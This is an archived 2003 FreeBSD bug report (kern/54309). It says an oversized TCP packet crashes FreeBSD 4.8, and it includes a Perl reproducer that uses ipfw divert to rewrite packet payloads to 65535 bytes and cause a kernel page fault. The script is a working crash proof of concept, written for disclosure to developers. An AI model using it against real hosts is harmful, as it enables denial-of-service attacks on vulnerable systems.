Date: Thu, 10 Jul 2003 09:10:14 +0100 From: Nigel Horne <njh@despammed.com> To: FreeBSD-gnats-submit@FreeBSD.org Subject: kern/54309: TCP Packet of 64K-1 crashes FreeBSD4.8 Message-ID: <200307100910.14218.njh@despammed.com> Resent-Message-ID: <200307100820.h6A8KLtZ027022@freefall.freebsd.org>
next in thread | raw e-mail | index | archive | help
>Number: 54309
>Category: kern
>Synopsis: TCP Packet of 64K-1 crashes FreeBSD4.8
>Confidential: no
>Severity: serious
>Priority: medium
>Responsible: freebsd-bugs
>State: open
>Quarter:
>Keywords:
>Date-Required:
>Class: sw-bug
>Submitter-Id: current-users
>Arrival-Date: Thu Jul 10 01:20:21 PDT 2003
>Closed-Date:
>Last-Modified:
>Originator: Nigel Horne
>Release: FreeBSD 4.8-RELEASE i386
>Organization:
NJH Music
>Environment:
System: FreeBSD gsec1.itac-uk.com 4.8-RELEASE FreeBSD 4.8-RELEASE #0: Wed Jul
9 13:46:32 BST 2003 njh@dev.itac.local:/usr/obj/usr/src/sys/NJHKERNEL i386
IBM, FreeBSD4.8
>Description:
A simple perl program (see attached) causes a kernel page fault
>How-To-Repeat:
#!/usr/bin/perl -wT
# To be run as root under FreeBSD
# First do: ipfw add divert 9999 tcp from any to <ip> 3994
# Where <ip> is the IP address of the prodigy, e.g. 192.168.3.40
# You may need to reconfigure BSD first to support ipfw:
# options IPFIREWALL
# options IPDIVERT
# options IPFIREWALL_FORWARD
# options IPFIREWALL_VERBOSE
# options IPFIREWALL_VERBOSE_LIMIT=100
# options IPFIREWALL_DEFAULT_TO_ACCEPT
# options IPFILTER
# options IPFILTER_LOG
# options TCPDEBUG
# options TCP_DROP_SYNFIN
# options ICMP_BANDLIM
# options DUMMYNET
# options IPSTEALTH
#
# Then try telnet 192.168.3.40 3994, sit back and watch the output
use strict;
use Net::Divert;
use NetPacket::IP;
use NetPacket::TCP;
my $ipFilter = Net::Divert->new('dev.gsec1.local', 9999);
$ipFilter->getPackets(\&handler);
sub handler {
my($packet, $fwtag) = @_;
my $ip = NetPacket::IP->decode($packet);
if($ip->{proto} == NetPacket::IP->IP_PROTO_TCP) {
my $tcp = NetPacket::TCP->decode($ip->{data});
print "source " . $tcp->{src_port} . " dest " .
$tcp->{dest_port} . "\n";
# $tcp->{flags} |= SYN;
# $tcp->{flags} &= ~ACK;
# $tcp->{seqnum} = 0;
$tcp->{data} = 'x' x 65535;
$ip->{data} = $tcp->encode($ip);
$packet = $ip->encode;
}
$ipFilter->putPacket($packet, $fwtag);
}
>Fix:
--
Nigel Horne. Arranger, Composer, Conductor, Typesetter.
Owner of the brass band group of the Internet. ICQ#20252325
njh@bandsman.co.uk http://www.bandsman.co.uk/music.htm
>Release-Note:
>Audit-Trail:
>Unformatted:
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?200307100910.14218.njh>